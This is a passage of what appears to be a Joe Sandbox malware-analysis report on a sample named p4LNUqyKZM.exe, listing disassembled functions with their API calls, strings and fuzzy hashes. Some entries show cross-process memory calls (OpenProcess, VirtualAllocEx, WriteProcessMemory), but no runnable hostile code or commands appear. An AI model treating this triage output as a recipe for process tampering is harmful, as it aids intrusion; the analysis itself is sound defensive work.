                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 9ce05c95fbc6ff211437d106105ea4da739661f84af4ba035856bc36c4ab5e8f
                        • Instruction ID: 15276874f6f6bf46c4a997959934cf6ba1553868c15792de3e28c7cafe1c3520
                        • Opcode Fuzzy Hash: 9ce05c95fbc6ff211437d106105ea4da739661f84af4ba035856bc36c4ab5e8f
                        • Instruction Fuzzy Hash: 8FF06239180351FBD7218FE5DC4DF963B6EEF89762F118414F945C72A1CA70DC418A60
                        Function 009E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009E102A
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009E1036
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1045
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009E104C
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1062
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 3ed91daf360af567bbb4adcb909725aa20f4207833e0f7bf15c7ef9fd26a473f
                        • Instruction ID: 686bc66e76c70a22fc60c60fff614478a26bd75941b4f32c6490b216dd644280
                        • Opcode Fuzzy Hash: 3ed91daf360af567bbb4adcb909725aa20f4207833e0f7bf15c7ef9fd26a473f
                        • Instruction Fuzzy Hash: 99F06D39280351FBDB229FE5EC49F963BAEEF89762F114424FA45C7250CA70DC418A60
                        Function 009F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0324
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0331
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F033E
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F034B
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0358
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0365
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: c0ecae9755810f8691e6523db7e8f8bbccd24ab10d242b0c2edfe98e3fca2ac2
                        • Instruction ID: 1403471d0aa1a7f51ba2514851dc518f684bbf2eea578c5903b548ceaae1ee71
                        • Opcode Fuzzy Hash: c0ecae9755810f8691e6523db7e8f8bbccd24ab10d242b0c2edfe98e3fca2ac2
                        • Instruction Fuzzy Hash: A801A272800B199FCB309F66D880822F7F9BF903153158A3FD29652932C3B1A955CF80
                        Function 009BD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 009BD752
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009BD764
                        • _free.LIBCMT ref: 009BD776
                        • _free.LIBCMT ref: 009BD788
                        • _free.LIBCMT ref: 009BD79A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 3bdec9aabb5e3eb24184a27046344dae4924bab37dce876065cc880b27ec76fd
                        • Instruction ID: befcf586a42ae01fa70eef0dbad01a2d8d6cfba3b1adc6f4ee762d7ae504c58b
                        • Opcode Fuzzy Hash: 3bdec9aabb5e3eb24184a27046344dae4924bab37dce876065cc880b27ec76fd
                        • Instruction Fuzzy Hash: F5F0C976546208BBC665EBA4FBC599677DDFB857307940C05F04CD7502DA21F8808664
                        Function 009E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 009E5C58
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 009E5C6F
                        • MessageBeep.USER32(00000000), ref: 009E5C87
                        • KillTimer.USER32(?,0000040A), ref: 009E5CA3
                        • EndDialog.USER32(?,00000001), ref: 009E5CBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: ff1d7340b1727e2427f67e6ebb70765fc6b2b6b25a97fbf471db5860b24c7ab7
                        • Instruction ID: 45efc56679fce4d29d27d353130abd970d5984ab978ce0c0cc161d1a7b031728
                        • Opcode Fuzzy Hash: ff1d7340b1727e2427f67e6ebb70765fc6b2b6b25a97fbf471db5860b24c7ab7
                        • Instruction Fuzzy Hash: 5301AD30540B04ABEB21AB51DD5EFE677B8BB04B09F011559E293A10E1DBF4AD85CA90
                        Function 009B22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 009B22BE
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009B22D0
                        • _free.LIBCMT ref: 009B22E3
                        • _free.LIBCMT ref: 009B22F4
                        • _free.LIBCMT ref: 009B2305
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 2e2a3233b422b00eff0e2dedd099b25207ff2f19133f5d32a5aa2134674109c5
                        • Instruction ID: 7ec0b099663c8f2da13669fbbaf792cc5bb8d0efc6a317468a707145b7c194e1
                        • Opcode Fuzzy Hash: 2e2a3233b422b00eff0e2dedd099b25207ff2f19133f5d32a5aa2134674109c5
                        • Instruction Fuzzy Hash: 3CF0F4794013109BC692EFD8BE01EDC3B69F759772B050A56F418D6271C73105539FE5
                        Function 009995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • EndPath.GDI32(?), ref: 009995D4
                        • StrokeAndFillPath.GDI32(?,?,009D71F7,00000000,?,?,?), ref: 009995F0
                        • SelectObject.GDI32(?,00000000), ref: 00999603
                        • DeleteObject.GDI32 ref: 00999616
                        • StrokePath.GDI32(?), ref: 00999631
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 2df6036c5b76c51de6643ad0a0a69c6ef495afb2b79176d6773cc899caa51459
                        • Instruction ID: aa65775e2b8202a43e09ca72700a3e41b7e1de87c5da747cbb4184df4f2c7e64
                        • Opcode Fuzzy Hash: 2df6036c5b76c51de6643ad0a0a69c6ef495afb2b79176d6773cc899caa51459
                        • Instruction Fuzzy Hash: B6F01430046308EBDB22DFADED18BB93BA9BB05372F448218F865950F0C7308992DF64
                        Function 009B0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __freea$_free
                        • String ID: a/p$am/pm
                        • API String ID: 3432400110-3206640213
                        • Opcode ID: 2065fff7083eb4130703fc692bb2d508176a5d9dcf4e59d919e70c8025315f53
                        • Instruction ID: 8ee1d93c4cec42699cd7ad7f74353e61503a8454899b1c595cd4e799fcd561ae
                        • Opcode Fuzzy Hash: 2065fff7083eb4130703fc692bb2d508176a5d9dcf4e59d919e70c8025315f53
                        • Instruction Fuzzy Hash: 0FD12831904206CBCB249F68CA69BFEB7F8FF46330FA84519E5119B650E3759D80CB91
                        Function 00A07B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009A0242: EnterCriticalSection.KERNEL32(00A5070C,00A51884,?,?,0099198B,00A52518,?,?,?,009812F9,00000000), ref: 009A024D
                          • Part of subcall function 009A0242: LeaveCriticalSection.KERNEL32(00A5070C,?,0099198B,00A52518,?,?,?,009812F9,00000000), ref: 009A028A
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009A00A3: __onexit.LIBCMT ref: 009A00A9
                        • __Init_thread_footer.LIBCMT ref: 00A07BFB
                          • Part of subcall function 009A01F8: EnterCriticalSection.KERNEL32(00A5070C,?,?,00998747,00A52514), ref: 009A0202
                          • Part of subcall function 009A01F8: LeaveCriticalSection.KERNEL32(00A5070C,?,00998747,00A52514), ref: 009A0235
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                        • String ID: 5$G$Variable must be of type 'Object'.
                        • API String ID: 535116098-3733170431
                        • Opcode ID: 0e6410b9ccdc1ec309b2cb1fef7d75e10f38c13b7df0a740e631783b0c5191db
                        • Instruction ID: 2c1d238e636b8c27b7ab14d3eb385c4a64d0c9a47d532d456886a39c421f5c3f
                        • Opcode Fuzzy Hash: 0e6410b9ccdc1ec309b2cb1fef7d75e10f38c13b7df0a740e631783b0c5191db
                        • Instruction Fuzzy Hash: 01917C74A04209AFCB14EF94E991ABEB7B1FF89300F148059F8069B291DB71AE45CB51
                        Function 009E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009E21D0,?,?,00000034,00000800,?,00000034), ref: 009EB42D
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009E2760
                          • Part of subcall function 009EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 009EB3F8
                          • Part of subcall function 009EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 009EB355
                          • Part of subcall function 009EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009E2194,00000034,?,?,00001004,00000000,00000000), ref: 009EB365
                          • Part of subcall function 009EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009E2194,00000034,?,?,00001004,00000000,00000000), ref: 009EB37B
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009E27CD
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009E281A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: 7a5843552f07ecd143978eccf2f16a7f95499c8de98ed5b3298788436dd965a8
                        • Instruction ID: 621050fc487ffc1219fbdc048f268d4a9701c49ce83952002dda882d1960c25f
                        • Opcode Fuzzy Hash: 7a5843552f07ecd143978eccf2f16a7f95499c8de98ed5b3298788436dd965a8
                        • Instruction Fuzzy Hash: 0E415C72900218AFDB11DFA4CD42BEEBBB8EF49300F009095FA55B7181DB716E45CBA1
                        Function 009B172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\p4LNUqyKZM.exe,00000104), ref: 009B1769
                        • _free.LIBCMT ref: 009B1834
                        • _free.LIBCMT ref: 009B183E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\p4LNUqyKZM.exe
                        • API String ID: 2506810119-356200998
                        • Opcode ID: 5c159161fc71f2c78cbe4fba81e134ad78b39c49f59e5ab509776909f66772f1
                        • Instruction ID: c98975794f892a5b6802da17fff34e1c57c9f34e353bff8ffd61ff3e7bf375e0
                        • Opcode Fuzzy Hash: 5c159161fc71f2c78cbe4fba81e134ad78b39c49f59e5ab509776909f66772f1
                        • Instruction Fuzzy Hash: E2316E71A40218ABDB21DF999A95EEEBBFCFB85320F54416AF804D7211DA708E41CB90
                        Function 009EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009EC306
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 009EC34C
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A51990,013658A0), ref: 009EC395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem
                        • String ID: 0
                        • API String ID: 135850232-4108050209
                        • Opcode ID: 6c3d91b634f0a351a00f953daa17a741c7554c7d83432b17b14fff5243e33c45
                        • Instruction ID: 6c91825b7aa7f27b8fc4d35962188b349899f541c4af2a6006b3ce917dbc763b
                        • Opcode Fuzzy Hash: 6c3d91b634f0a351a00f953daa17a741c7554c7d83432b17b14fff5243e33c45
                        • Instruction Fuzzy Hash: 7E41B2B12043819FD721DF26D844F5ABBE8AF85321F048A1DF9A5972D1D730ED06CB62
                        Function 00A14416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1CC08,00000000,?,?,?,?), ref: 00A144AA
                        • GetWindowLongW.USER32 ref: 00A144C7
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A144D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: e9c9e12a6fb5a0e8555ac02fd345a613e21cd3e2f8a25d34618acb978dcc1abc
                        • Instruction ID: 156ac405e5d1b2d24b4dae4118be53eec8ea3b0b0da3f9e04b3b2fcf41ccb9ff
                        • Opcode Fuzzy Hash: e9c9e12a6fb5a0e8555ac02fd345a613e21cd3e2f8a25d34618acb978dcc1abc
                        • Instruction Fuzzy Hash: 5331AB32200205AFEF209F78DC45BEA7BAAEB48334F208725F975921E0D770EC919B50
                        Function 00A0304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A0335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A03077,?,?), ref: 00A03378
                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
                        • _wcslen.LIBCMT ref: 00A0309B
                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00A03106
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 946324512-2422070025
                        • Opcode ID: 6f2befddb1463483c5e4277b047c849d7dbbf49b15885c5a14a7bb372b04176d
                        • Instruction ID: 4bb475fb338b6f4267e414292a96bcc4a2fe9a75258f1b88cc2cd4034aa50604
                        • Opcode Fuzzy Hash: 6f2befddb1463483c5e4277b047c849d7dbbf49b15885c5a14a7bb372b04176d
                        • Instruction Fuzzy Hash: 4B31D33A6002099FCF10CF68E585EAA77F8EF54318F248159E9158B3D2DB72EE45C761
                        Function 00A13EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A13F40
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A13F54
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A13F78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: 5260ff640d653aa8523228537818f5e6a0d1f440f96e5823d5a8cfb732a45d1e
                        • Instruction ID: 8e2879063012f9595f3a25ba92ff17e83c27385c4ed1815f935561bde6bf3dd9
                        • Opcode Fuzzy Hash: 5260ff640d653aa8523228537818f5e6a0d1f440f96e5823d5a8cfb732a45d1e
                        • Instruction Fuzzy Hash: 07218B33600219BBDF259F90DC46FEA3B7AEB88724F110214FA15AB1D0D6B5A9958B90
                        Function 00A14653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A14705
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A14713
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A1471A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
